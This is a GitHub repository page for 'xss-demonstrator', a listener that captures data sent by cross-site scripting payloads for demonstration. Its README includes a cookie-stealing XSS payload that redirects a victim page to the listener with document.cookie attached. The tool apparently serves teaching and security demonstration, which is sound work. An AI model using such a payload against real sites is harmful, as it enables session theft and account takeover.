Skip to content

A simple interactive listener for demonstrating XSS attacks

License

Notifications You must be signed in to change notification settings

nolze/xss-demonstrator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

xss-demonstrator

A simple interactive listener for demonstrating XSS attacks.

screen capture

Usage

1. Start demonstrator

npm start

2. Execute an XSS payload on the victim webpage

window.location = "http://localhost:8080/?" + document.cookie

3. The webpage is opened with the stolen cookies in demonstrator

Example

1. Start demonstrator

npm start

2. Start the example server

cd example
node server.js

3. Open http://localhost:8000/

Todo

  • Add config feature
  • Complete packaging
  • Add tunneling proxy feature
  • Add more information gathering features
  • Add tests
  • Add icon
  • Add auto update

See also

About

A simple interactive listener for demonstrating XSS attacks

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published